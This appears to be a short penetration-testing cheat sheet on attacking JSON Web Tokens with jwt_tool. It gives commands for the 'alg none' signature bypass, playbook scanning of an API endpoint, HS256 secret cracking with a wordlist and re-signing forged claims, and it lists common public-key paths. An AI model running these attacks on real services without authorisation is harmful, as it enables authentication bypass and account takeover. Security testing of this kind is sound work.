JWT Tool
JWT tool kit, JWT token
Structure
https://auth0.com/docs/secure/tokens/json-web-tokens/json-web-token-structure
Debugger
Best online tool is https://token.dev JWT debugger.
JWT Tool
https://github.com/ticarpi/jwt_tool
https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
Signature Verification Attacks
Algorithm None Bypass
./jwt_tool.py JWT_TOKEN -X a
Token attacks on POST data endpoint
python3 ./jwt_tool.py -M pb -t http:/URL/api/method -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"
HS256 - HMAC secret cracking
python3 ./jwt_tool.py JWTTOKEN --crack --dict /path/wordlist/secrets.txt
# modify payload claims
python3 ./jwt_tool.py JWTTOKEN --sign hs256 --password secret -T
RS256 - Find public Key
Searching public key for cracking the primary key
https://github.com/ticarpi/jwt_tool/wiki/Finding-Public-Keys
/.well-known/jwks.json
/openid/connect/jwks.json
/jwks.json
/api/keys
/api/v1/keys
Last updated
Was this helpful?